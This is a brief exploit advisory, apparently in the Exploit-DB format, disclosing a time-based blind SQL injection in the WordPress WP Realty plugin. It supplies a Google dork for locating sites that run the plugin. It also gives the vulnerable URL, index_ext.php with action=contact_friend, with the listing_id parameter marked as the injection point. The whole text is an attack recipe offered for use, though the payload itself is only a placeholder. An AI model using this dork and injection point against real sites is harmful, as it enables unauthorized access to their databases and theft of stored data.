WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]